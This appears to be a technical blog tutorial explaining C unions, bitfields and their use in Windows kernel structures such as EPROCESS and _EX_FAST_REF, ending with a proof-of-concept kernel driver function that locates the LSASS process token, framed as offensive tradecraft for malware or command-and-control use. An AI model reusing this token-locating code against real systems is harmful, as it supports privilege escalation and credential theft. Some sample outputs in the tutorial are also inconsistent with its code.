Most people who learn C after a language like Python or JavaScript are stumped at the concept of the union, a native C data type. Unions look like structures, but their behavior couldn’t be farther from it. If C is meant to abstract raw assembly, the union is a subtle reminder that you are, at all times, just one step away from writing low-level code.

This walkthrough will explore unions beyond the surface level. We’ll start with some basics, refer to specifications, then look at a few examples. We’re also going to look at how they appear in the Windows kernel, keeping an eye on offensive tradecraft.

About Unions

Here’s a simple union definition:

union foo_u {
  int i;
  unsigned char c;
};

This union has two fields: an integer i and a byte c. We can use it in code like such:

int main() {
  union foo_u foo;
  foo.i = 21;
  printf("foo.i: %d\n", foo.i);
}

This will print foo.i: 21 to the console. The disassembly looks something like this:

    1139:       55                      push   rbp
    113a:       48 89 e5                mov    rbp,rsp
    113d:       48 83 ec 10             sub    rsp,0x10
    1141:       c7 45 fc 15 00 00 00    mov    DWORD PTR [rbp-0x4],0x15
    1148:       8b 45 fc                mov    eax,DWORD PTR [rbp-0x4]
    114b:       89 c6                   mov    esi,eax
    114d:       48 8d 05 b0 0e 00 00    lea    rax,[rip+0xeb0]
    1154:       48 89 c7                mov    rdi,rax
    1157:       b8 00 00 00 00          mov    eax,0x0
    115c:       e8 cf fe ff ff          call   1030 <printf@plt>
    1161:       b8 00 00 00 00          mov    eax,0x0
    1166:       c9                      leave
    1167:       c3                      ret

This sets EAX to 0x15 (21).

Now, let’s modify the main function to use the c property:

  union foo_u foo;
  foo.i = 21;
  printf("foo.i: %d\n", foo.i);
  foo.c = 'A';
  printf("foo.c %d\n", foo.c);

Will print

foo.i: 21
foo.c: A

Let’s take another look at the disassembly:

    1139:       55                      push   rbp
    113a:       48 89 e5                mov    rbp,rsp
    113d:       48 83 ec 10             sub    rsp,0x10
    1141:       c7 45 fc 15 00 00 00    mov    DWORD PTR [rbp-0x4],0x15
    1148:       8b 45 fc                mov    eax,DWORD PTR [rbp-0x4]
    114b:       89 c6                   mov    esi,eax
    114d:       48 8d 05 b0 0e 00 00    lea    rax,[rip+0xeb0]
    1154:       48 89 c7                mov    rdi,rax
    1157:       b8 00 00 00 00          mov    eax,0x0
    115c:       e8 cf fe ff ff          call   1030 <printf@plt>
    1161:       c6 45 fc 41             mov    BYTE PTR [rbp-0x4],0x41
    1165:       0f b6 45 fc             movzx  eax,BYTE PTR [rbp-0x4]
    1169:       0f b6 c0                movzx  eax,al
    116c:       89 c6                   mov    esi,eax
    116e:       48 8d 05 9a 0e 00 00    lea    rax,[rip+0xe9a]
    1175:       48 89 c7                mov    rdi,rax
    1178:       b8 00 00 00 00          mov    eax,0x0
    117d:       e8 ae fe ff ff          call   1030 <printf@plt>
    1182:       b8 00 00 00 00          mov    eax,0x0
    1187:       c9                      leave
    1188:       c3                      ret

At offset 0x1141, the memory that holds the union rbp-0x4 is still set to 0x15 (21) just as before. So, the first part of the code has not changed.

However, that same exact memory location is also used to hold 0x41 (‘A’). We can modify the each print statement to get a better idea of what’s happening in memory:

  union foo_u foo;
  foo.i = 21;
  printf("foo.i: %016x, foo.c: %016x\n", foo.i, foo.c);
  foo.c = 'A';
  printf("foo.i: %016x, foo.c: %016x\n", foo.i, foo.c);

This will print the 8-byte (64-bit) hex representation of each property:

foo.i: 0000000000000015, foo.c: 0000000000000015
foo.i: 0000000000000041, foo.c: 0000000000000041

The same memory location is used for both fields. When you set one field to a value, all other fields will use that same value. What’s the point?

You can think of union fields as ways to cast data at some location. When you set any field in a union, it will update some location in memory. In this case, if you access the i field, it will cast that data as an integer. If you access the c field, it will cast that data as a character. Unlike structures, when you set the value of a union’s field, you will overwrite the entire space allocated for that union (minus padding for alignment).

This matches the type’s definition in the ISO C 98 standard:

A union type describes an overlapping nonempty set of member of objects, each of which has anoptionally specified name and possibly distinct type.

Put another way, you can store a DWORD and a BYTE in the same four-byte region. If you had defined this as a struct, the size would be five bytes and would occupy eight bytes total (due to alignment). Compared to structs, unions are a counterintuitive way to save memory.

This is one major reason why people might use unions: to save memory. The savings can prove crucial on systems with memory restrictions, or for components, like kernels, where you want to optimize memory usage.

One obvious caveat here is that you can lose track of which property is in use at a given time. If you’re not aware of that, you may try to write unions as though they were structs. Consider the following buggy code:

  foo.i = 21;
  printf("My favorite number is %d\n", foo.i);
  foo.c = 'A';
  printf("My favorite number is still %d\n", foo.i);

The “bug”:

My favorite number is 21
My favorite number is still 65

This otherwise-annoying runtime bug could lead to a potentially devastating information leaks with a union like:

#include <stdio.h>
#include <string.h>

union UserInfo_u {
  char *username;
  int  birthyear;
  char *password;
  int  creditCardNumber;
};

void 
SetUsername(union UserInfo_u *user);

void
SetSecurePassword(union UserInfo_u *user);

int 
main() {
  union UserInfo_u user;
  SetUsername(&user);
  SetSecurePassword(&user);
  printf("Username: %s\n", user.username);
}

...

// $ gcc userinfo.c -o userinfo
// $ ./userinfo
// Username: S3cure_Pa$$w0rd

For this reason, it’s common to see different patterns that indicate which “property” is currently in use.

An obvious solution is to use a module-level or global variable. An obvious caveat is that you’re now tracking different variables that refer to the same data.

Another solution is to encapsulate the union in a structure which tracks the current type. Consider the example:

struct SomeUnion_u {
  int property;
  union data {
    unsigned long foo_A;
    unsigned long long foo_B;
    int foo_C;
    unsigned long long foo_D;
    unsigned char foo_E;
  };
};

The property field is honestly an arbitrary data type. An int would let you “select” the current field to use, similar to how an index in an array lets you select which element you want. Unlike an array, a union may have variable data types, so this might be an acceptable way to abstract data for some purpose.

With 64-bit alignment, the SomeUnion_u union only takes up only 8 bytes. If it were a struct instead, it would be closer to 40 bytes. If you had an array of such structs, it could take over 4x the amount of space.

This approach is simple but, unfortunately, also naive. You still have to allocate extra space to work with the “property” field. In addition, because there are so many different types, it should make you wonder if a struct wouldn’t be a better choice, albeit at a storage cost.

Because of these reasons, you’re likely not to see unions as a way to naively replace structures. You are far more likely to see them as a creative way to manipulate data in some memory space. The Windows kernel has a few examples of ways to do this.

Using data bitfields

Let’s consider a use case where you want to manipulate specific bits in a byte, word, dword, or qword. Traditionally, this is handled through bit-mask operations (AND’ing or OR’ing). They work, and they’re good to know, but the syntax is pretty ugly.

Unions let you handle the bits without all the ugly bit-mask syntax.

For example, consider:

union DataWithBitfields_u
{
  unsigned char data;
  struct
  {
    unsigned char bit1:   1;
    unsigned char bit2_3: 2;
    unsigned char bit4:   1;
    unsigned char nibble1:4;
  };
};

Here, we have a one-byte union: an unsigned char, which can be evaluated at face value; and an eight-bit struct, which allows us to operate on bits 1, 2, 3, 4, and the last four bits, independently. This gives us two ways to handle the same data at this byte.

Each bit can be manipulated as a property. However, if you want to evaluate the entire 8-bit (1 byte) space of memory, you can do it by accessing the data field directly. It works because it all refers to the same exact data.

#include <stdio.h>

union DataWithBitfields_u
{
  unsigned char data;
  struct
  {
    unsigned char bit1:1;
    unsigned char bit2_3:2;
    unsigned char bit4:1;
    unsigned char nibble1:4;
  };
};

int 
main()
{
  union DataWithBitfields_u u;
  u.data = 0;
  printf("%x\n", u);
  u.bit4 = 1;
  printf("%x\n", u);
  u.bit4 = 0;
  u.bit2_3 = 3;
  printf("%x\n", u);
}

Using bitfields in this way is a common development pattern in the EPROCESS structure, a data type used in the Windows kernel to store information about processes. You’ll notice this in the Flags2 field:

struct _EPROCESS
{
    ...
    union
    {
        ULONG Flags2;                              //0x460
        struct
        {
            ULONG JobNotReallyActive:1;            //0x460
            ULONG AccountingFolded:1;              //0x460
            ULONG NewProcessReported:1;            //0x460
            ULONG ExitProcessReported:1;           //0x460
            ...
            ULONG ProcessStateChangeInProgress:1;  //0x460
            ULONG InPrivate:1;                     //0x460
        };
    };

In this way, the properties of Flags2 can be set by accessing any of these fields, most of which refer to a specific bit in the 32-bit structure. Flags2 itself is 32 bits (ULONG) and can be accessed directly to get the four-byte value of all these bits. You can see this in the debugger:

kd> dt _eprocess ffffe48455c32240
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   ...
   +0x460 Flags2           : 0xd000
   +0x460 JobNotReallyActive : 0y0
   +0x460 AccountingFolded : 0y0
   +0x460 NewProcessReported : 0y0
   +0x460 ExitProcessReported : 0y0
   ...
   +0x460 ProcessStateChangeInProgress : 0y0
   +0x460 InPrivate        : 0y0

The developer has two ways to evaluate the value of Flags 2: using the four-byte dword, or by assessing each bit or bitfield individually. The kernel has the flexibility to evaluate these bit fields on their own or to evaluate the entire four-byte DWORD as a whole. Thanks to the union, there are many ways to manipulate the same data.

Using trivial bitfields

Another approach could use some bytes for data, but leave the last N bits for other data, such as flags or properties.

union AnotherUnion_u 
{
  void *stackLocation;
  unsigned long long flags:3;
};

This union will compile to 8 bytes: enough to hold a 64-bit address plus some extra information. Note, however, that the final 3 bits of the last byte will be some value between 0 - 7.

Obviously, this could be a problem in another architecture. But 64-bit stacks are 8-byte aligned. This means, the last digit in the last byte will always be 0 or 8. A developer could design their application to “mask out” the last 3 bits and get an address to the stack:

>>> hex(0x01234567 & ~0xf)
'0x1234560'

At the same time, you can use those last three bits to hold some information that may prove useful:

>>> hex(0x01234567 & 0xf)
'0x7'

In this way, technically, neither field in the union is “modified.” The address is assumed to be byte-aligned in a way that ignores the flags. Those last three bits can coexist until the address is needed, in which case, the developer can just separate that information.

This is exactly what happens with the _EX_FAST_REF structure in the windows kernel:

struct _EX_FAST_REF 
{ 
  union 
  { 
    VOID* Object;       //0x0 
    ULONGLONG RefCnt:4; //0x0 
    ULONGLONG Value;    //0x0
  }; 
};

In WinDbg, you can see that all fields have the same offset. As observed from the sample code earlier, this indicates a union type:

kd> dt nt!_EX_FAST_REF
   +0x000 Object           : Ptr64 Void
   +0x000 RefCnt           : Pos 0, 4 Bits
   +0x000 Value            : Uint8B

This union exists within an EPROCESS struct, which, as noted earlier, tracks the state of a given process. To further explore, we can attach WinDbg to a kernel session, open PowerShell as an administrator, and analyze that now-privileged PowerShell process:

kd> dt _eprocess ffffe48455c32240 token
ntdll!_EPROCESS
   +0x4b8 Token : _EX_FAST_REF

The _EX_FAST_REF union holds a pointer to the process’ token. Depending on the process, the token can give you elevated or administrative privileges. Processes like LSASS give you a high-enough privilege for many red-team engagements or real-world malware. Because of that, it is the topic of many writeups.

Unfortunately, the pointer in the union is not correctly aligned by default:

kd> dt _ex_fast_ref ffffe48455c32240+0x4b8
ntdll!_EX_FAST_REF
   +0x000 Object           : 0xffffbb04`90d2106d Void
   +0x000 RefCnt           : 0y1101
   +0x000 Value            : 0xffffbb04`90d2106d

The RefCnt bits 1101 will need to be dropped in order to get the token’s location:

>>> hex ( 0xffffbb0490d2106d & ~0xf )
'0xffffbb0490d21060'

You can confirm your findings using the “easy way” in WinDbg:

kd> !token 0xffffbb0490d21060
_TOKEN 0xffffbb0490d21060

    // Token data dumps here...

From the attacker’s point of view, it’s useful to know that the underlying data type of an EX_FAST_REF is a union. Knowing this, we can discard the last three bits of RefCnt, because we know it’s extra data, not part of the token’s address.

Exploitation example

We can use the following driver code for WDM to get an LSASS token. This is just proof-of-concept code, littered with manual offsets, and targeting one specific Windows version (Windows 10 2H22). It’s important to note that the Windows Driver Kit does not include many definitions, including the full EPROCESS structure, so we use offsets to get the same data “the hard way.”

QWORD*
GetLsassToken()
{
    PEPROCESS process = PsInitialSystemProcess;

    // EPROCESS.activeProcessLinks at offset EPROCESS+0x448
    PLIST_ENTRY activeProcessLinks = (PLIST_ENTRY)((unsigned char *)process+0x448);
    
    // EPROCESS.ImageFileName at offset EPROCESS+0x5a8
    PCHAR imageFileName = (PCHAR)((char *)process + 0x5a8);
    int r = -1;
    QWORD* tokenPtr = NULL;

    while (1) {
        // KPROCESS base at EPROCESS.activeProcessLinks-0x448
        process = (PEPROCESS)(((char *)activeProcessLinks->Flink) - 0x448);
        if (process == PsInitialSystemProcess) break;
        imageFileName = (PCHAR)((char *)process + 0x5a8);
        activeProcessLinks = activeProcessLinks->Flink;
        if (_strnicmp(imageFileName, "lsass.exe", 15) == 0) break;
    }
    
    KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL,
        "[+] Process.ImageFileName: %s\n",
        imageFileName));

    if (_strnicmp(imageFileName, "lsass.exe", 15) != 0) return NULL;

    // EPROCESS.Token at offset EPROCESS+0x4b8
    tokenPtr = (QWORD*)((QWORD)((char*)process + 0x4b8) & ~0xf);

    KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL,
        "[+] Process.Token: %p\n",
        tokenPtr));

    return tokenPtr;
}

This script loops through every process until lsass.exe is found. It takes the LSASS token and returns it for further use.

In this code, we access the token’s address from the EPROCESS structure’s EX_FAST_REF field in one statement, which in many ways summarizes the debugging we did earlier:

    // EPROCESS.Token at offset EPROCESS+0x4b8
    tokenPtr = (QWORD*)((QWORD)((char*)process + 0x4b8) & ~0xf);

In a real-world campaign, you could give this token to a second-stage malware or command-and-control server for further system abuse.

The big note here is that we are basically accessing EPROCESS.Token. Because we have some insight into its data type (EX_FAST_REF), we know that the final bits could contain superfluous data. Because we have some insight into token address alignment, we also know that we can safely drop them (& ~0xf).